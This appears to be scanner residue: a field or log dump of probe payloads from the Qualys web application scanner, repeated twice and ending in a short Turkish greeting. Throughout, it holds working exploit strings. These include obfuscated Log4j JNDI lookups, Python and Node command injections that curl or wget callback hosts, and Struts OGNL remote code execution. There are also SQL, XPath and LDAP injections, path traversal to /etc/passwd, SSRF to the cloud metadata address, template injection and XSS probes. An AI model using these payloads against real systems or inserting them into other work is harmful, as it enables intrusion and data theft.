@pd.core.frame.com.builtins.__import__("os").system("""curl 5f9276b61251eecfbdd7264fa388730f74c59bca.17026060393642422.3685799785.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","b279a4a189626732113a979e1339b68fedf98b27.17026060393642422.1457003159.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://7a2958f5f816b4fa91fee436a2919ffc3ecc0dd4.17026060393642422.351732229.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://d612efc2d687a7e4ff5e6550a0a1043e07b485f0.17026060393642422.3543087180.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//f72da0d930bde4a1ebc4c2c3bc6632e84015251d.17026060393642422.726928016.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://1cfc2a0d885b418f9bc3f6f1e1e185c33caab15e.17026060393642422.241384168.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//c5b36d6a12dbe058df966561f633baa60e8b3cfd.17026060393642422.798863109.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://9b8ef3a6503faafd61d2a75129ed606bfe521f27.17026060393642422.2454217186.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//572c03c164ccdeaecc2653f0fa19efa8ae7eb776.17026060393642422.3745052459.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://ebd0d7d4f5efdcd149c676f5832d52ec484cf372.17026060393642422.2937351801.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://a3ce9ec86c05f18ef2a54ac995ee4d38f02e434a.17026060393642422.3292814059.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://04e41a591df535a15b4ff81616f08a3d9160b182.17026060393642422.2362823586.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://4d4c907395c9fbf57296119f8275773b176b26b5.17026060393642422.2108594805.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
70afb57829b787f75ddc401044d67cbe13baabcc.17026060393642422.265769078.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://d49746f2d365c9076db3a3072dfb315bcd32bd68.17026060393642422.2709315009.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@5e97b405b2b7a93fe1842bd02d8846b158e8a9f0.17026060393642422.3128345252.smtphi01.smtp.eu2.qualysperiscope.com.
1)(|(uidNumber=*)
1
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxssmiZ2oJqg};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxsskv39uP31()-"
1
'-qxssXD8le43W()-'
1
*/;(function(){qxss4hYii460});/*
1
9 ;(function(){qxss6hS6fg54});//
1
9;(function(){qxssMJ4HG0ne});//
1
';(function(){qxss7ukis42F});/**/'
qualys(aqxssvRi3zKs4)xyz
1
1
");(function(){qxss1WWbwx51});/**/"
1
";(function(){qxssAh4n4Dxa});/**/"
1
javascript:qxss(X153089140Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
q Qualys_resp_hdr_injection: Vulnerable
1
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qss0qi081fq=7< /script>
1
" onEvent=X153089140Y1_2Z
1
' onEvent=X153089140Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qss8mrQ8i1M=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(Z6bZb8QT)
1
_q=random(X153089140Y1_2Z)
1
_q=random(X153089140Y1_2Z)
1
"'>
1
z-->
1"'>
1
">
1
1
javascript:qxss(X153089140Y1_2Z);
1
" onEvent=X153089140Y1_2Z
' onEvent=X153089140Y1_2Z
1
1
_q=random(X153089140Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1' or true() or 'and' = 'and
15 oR 9=8 + 1
11 or 11=12
1
1
1
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1 or NULL IS NULL
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1
1
1' or 3789=3789 --
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 124c248550b3f52358bb4edf2c945ccf7e1f7f91.16981749393642422.4245160085.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 6dcc58776fe250f4a71f2b100ccc6433ff0266ca.16981749393642422.1272571866.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 4101ad324d51ea97886b69c2b87a78e6d76be6a1.16981749393642422.2705356491.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 24e63567b9e49dd388e320b93022e77dea127b61.16981749393642422.2880969732.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 199592720737992fe91510e492308f8a0a63f0b6.16981749393642422.1938710017.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","0eda2534a247f97aaa959a827dcad7f9907c3d06.16981749393642422.1262978190.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://d5c7a7d110dc574e11f3a9ca04dc16b88e63fc5d.16981749393642422.2693672873.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://5fdcdaea08e22fa80c81162c2d3e16e708ed54f9.16981749393642422.2903810280.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//d9bc96c28f4f19e6d752f15e47cec9c7d80f285d.16981749393642422.13175584.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://a97bf714a5fc97bc66de32c5ec0eaa94537b573c.16981749393642422.1127112941.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//034b1215093e32b9d31be10aad364824cae7b52c.16981749393642422.915996119.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://bc52b42088232742b26bebcef1f018510e5bc9f8.16981749393642422.4285345507.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//cea4cd0cc89632399112bced1c14acd5fd47b61a.16981749393642422.3044528586.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://2fdc12ed0375f6b11ada5846f6743223a37bb234.16981749393642422.360685688.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://88fdc6054418ab32d6c347e3a72e6c3effecd472.16981749393642422.976497224.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://6049c0bb3f4fb97ee2e9259cf8756aec7185ecdf.16981749393642422.1477254060.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://6e0d2ec1ec74a8ff2bbaa824842913282a3b8feb.16981749393642422.1457037760.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
d2a0f2d82fe694f649d8868f74fdc0229f5d9249.16981749393642422.3970755257.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://f28936d9c79029a3f62571f1e7ba84d1ea14286d.16981749393642422.4068228390.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@982337ef97772ef67c36cc9fa8195fe829ade136.16981749393642422.1762669145.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxssT0UG0jFI};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssm8zZa1M4()-"
1
'-qxssajvplh6l()-'
1
*/;(function(){qxss5vd7hF8v});/*
1
9 ;(function(){qxss79205w7i});//
1
9;(function(){qxssBPO1O2lF});//
1
';(function(){qxssnRutgo6S});/**/'
1
qualys(aqxss3h2BRB00)xyz
1
");(function(){qxssrxJz16as});/**/"
1
";(function(){qxss0197Tu2b});/**/"
1
javascript:qxss(X178144412Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
/*
1
#
1
1
;--
1
1'
qualyswasesi
1
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
111222
1
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qsskAkvWehb=7< /script>
1
" onEvent=X178144412Y1_2Z
1
' onEvent=X178144412Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qssw1YlZ1Mp=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(59pGM7r2)
1
_q=random(X178144412Y1_2Z)
1
_q=random(X178144412Y1_2Z)
1
"'>
z-->
1
1
1"'>
1
">
1
javascript:qxss(X178144412Y1_2Z);
1
" onEvent=X178144412Y1_2Z
' onEvent=X178144412Y1_2Z
1
_q=random(X178144412Y1_2Z)
1
1
"'>
1
Merhaba! Ben Özgür 22 yaşındayım.